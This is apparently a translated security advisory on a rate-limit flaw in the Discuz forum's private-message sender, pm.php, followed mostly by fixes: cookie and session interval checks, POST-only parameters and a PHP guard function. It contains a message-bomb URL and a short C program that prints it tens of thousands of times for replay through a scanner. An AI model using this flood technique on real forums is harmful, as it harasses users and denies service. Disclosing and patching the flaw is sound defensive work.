Discuz Forum Short Message Unlimited-Send Count Vulnerability

Source: Internet
Author: User

Preface
The Discuz forum is a PHP forum system developed by Crossday Studio (www.discuz.com). Its official introduction reads: "an efficient forum solution designed to suit various server environments. From the start, Discuz! set out to improve product efficiency, reduce enterprise costs and improve enterprise competitiveness. After more than a year of development and practical testing of the new kernel architecture, it stands out from many competitors in a short time and achieves unprecedented load capacity." As a forum, Discuz is indeed a top-notch player. Its security, however, still leaves room for improvement.
Affected versions:
All current free versions (I do not have the commercial version to test)
Description:
The send code in pm.php does not limit the interval between two messages. As a result, any registered user can send a message bomb to any other user, consuming server disk space and resources; in severe cases this amounts to a denial of service.
Details:
Look at line 86 of the pm.php file:
86 } elseif($action == 'send') {
87
88     if(!$pmsubmit) {
......
179     showmessage('pm_send_succeed', 'pm.php');
180 }
This part of the code contains no check on the interval between a user's messages. Any registered user only needs to log in and submit:
http://127.0.0.1/discuz/pm.php?action=send...st&message=test
to bomb the user angel with messages. A more efficient attack method:
#include <stdio.h>

int main(void)
{
    int i;
    /* Print the same send URL 55933 times, one per line. The original passed i to
       printf without a matching format specifier; that unused argument is dropped. */
    for (i = 0; i < 55933; i++)
    {
        printf("\nwww.xxx.com/discuz/pm.php?action=send&pmsubmit=submit&msgto=angel&subject=test&message=test");
    }
    return 0;
}
Compile it, run file.exe > discuzpm.txt, and then import discuzpm.txt into any CGI scanner. Run ......
Defense methods:
1. Restrict the user's sending Interval
A PHP session or a cookie can be used to limit the interval between two messages. When handling a message sent by a user, either of the two methods below tells you whether that user is sending again within the configured interval. Assume the administrator sets the interval between two messages to 2 minutes; the two examples follow:
Cookie method:
if (!empty($_COOKIE['beforepmid'])) {
    die("sorry, the interval between your two messages is less than 2 minutes"); // beforepmid: ID of the previous message
} else {
    setcookie("beforepmid", $pmid, time() + 60*2, "/", "", 0); // $pmid: ID of this message
}
Session method:
session_start();
if (isset($_SESSION['time']) && time() - $_SESSION['time'] < 60*2) {
    die("sorry, the interval between your two messages is less than 2 minutes"); // $_SESSION['time']: time of the previous message
} else {
    $_SESSION['time'] = time();
}
It may seem that, because the cookie is sent to the client, an attacker can simply delete it, and that the session, which stays on the server, is safer. In fact I think the two are about the same: the cookie is re-sent with every request, and the interval between requests is very short. Still, we cannot rule out a small program that deletes cookies, so to be thorough use the session. The session version is the file session_pm.php: remove the "session_" prefix and copy it over pm.php in the Discuz directory. Remember to back up the original pm.php in the Discuz directory first, to avoid irreparable mistakes.
If you prefer to use cookies to prevent the attack, use cookie_pm.php: remove the "cookie_" prefix and copy it over pm.php in the Discuz directory. Again, back up the original pm.php in the Discuz directory first.
2. How to defeat the efficient attack described above
Add the following code after the first line of pm.php:
$pmsubmit = $_POST['pmsubmit'];
$msgto = $_POST['msgto'];
$subject = $_POST['subject'];
$message = $_POST['message'];
With this, the efficient attack above no longer works: the parameters are taken only from the POST body, so a URL list of GET requests carries no usable values.
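The two defences above combined into one guard function that pm.php's send branch could call before inserting a message. This is an added example, not Discuz's own code or the author's patched pm.php; the function name pm_send_guard, the session key pm_last_send, the PM_INTERVAL constant and the message key pm_send_invalid are this example's own assumptions, while pm_send_partition is the language-pack key introduced later in this article.

```php
<?php
// Added example (not Discuz's own code): a single guard that applies both
// defences from this article. Names such as pm_send_guard, pm_last_send and
// PM_INTERVAL are assumptions made for this example.

define('PM_INTERVAL', 60 * 2);   // administrator's setting: 2 minutes between two messages

// Returns null when the send may proceed, or a message key (as used with
// showmessage()) explaining why it was refused.
function pm_send_guard(array $post, array &$session, int $now, int $interval = PM_INTERVAL): ?string
{
    // Defence 2: honour parameters from the POST body only, so a bare GET URL
    // (the kind a URL-list generator produces) never reaches the send code.
    foreach (['pmsubmit', 'msgto', 'subject', 'message'] as $field) {
        if (!isset($post[$field]) || $post[$field] === '') {
            return 'pm_send_invalid';   // hypothetical key, not one of Discuz's
        }
    }

    // Defence 1, session variant: the timestamp is kept server-side, so the
    // client cannot discard it the way it could discard a cookie.
    if (isset($session['pm_last_send']) && $now - $session['pm_last_send'] < $interval) {
        return 'pm_send_partition';      // the language-pack key added in this article
    }
    $session['pm_last_send'] = $now;     // record this send for the next check
    return null;
}

// Usage inside pm.php's send branch (illustrative):
// session_start();
// if (($err = pm_send_guard($_POST, $_SESSION, time())) !== null) {
//     showmessage($err, 'pm.php');
// }
// ... proceed to insert the message ...

// Self-check with constructed input when run from the command line.
if (PHP_SAPI === 'cli') {
    $session = [];
    $post = ['pmsubmit' => 'submit', 'msgto' => 'angel', 'subject' => 'test', 'message' => 'test'];
    var_dump(pm_send_guard($post, $session, 1000));        // NULL: first message goes through
    var_dump(pm_send_guard($post, $session, 1030));        // "pm_send_partition": 30 s later, refused
    var_dump(pm_send_guard($post, $session, 1120));        // NULL: 120 s after the last accepted send
    var_dump(pm_send_guard([], $session, 2000));           // "pm_send_invalid": no POST fields at all
}
```

Note that a refused send does not update the stored timestamp, so the interval is measured from the last accepted message rather than from the last attempt; that matches the article's "interval between two messages" rule and keeps a flood of rejected requests from pushing the window further out.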
Finally, two modified pm.php files are attached (http://www.4ngel.net/img/pm.rar): one uses the cookie method, the other the session method. To use one directly, rename it to pm.php, copy it over the file in the discuz directory, and then go to the admin backend: Interface Style -> Template System.
Edit the templates option of the Discuz! language pack. Search for "pm_box_isfull":
'pm_box_isfull' => 'Your mailbox is full. You must delete unnecessary messages before reading this short message.',
and change it to the following:
'pm_box_isfull' => 'Your mailbox is full. You must delete unnecessary messages before reading this short message.',
'pm_send_partition' => 'Sorry, the interval between your two messages is less than 2 minutes.',
'pm_nonexistence' => 'Sorry, the short message does not exist or has been deleted.'
Special thanks to Jin Xuan Net (http://www.gixuan.net) for their great support and help. In fact, the Discuz forum is still an immature forum with a number of vulnerabilities, large and small. The developers are expected to pay attention to them.
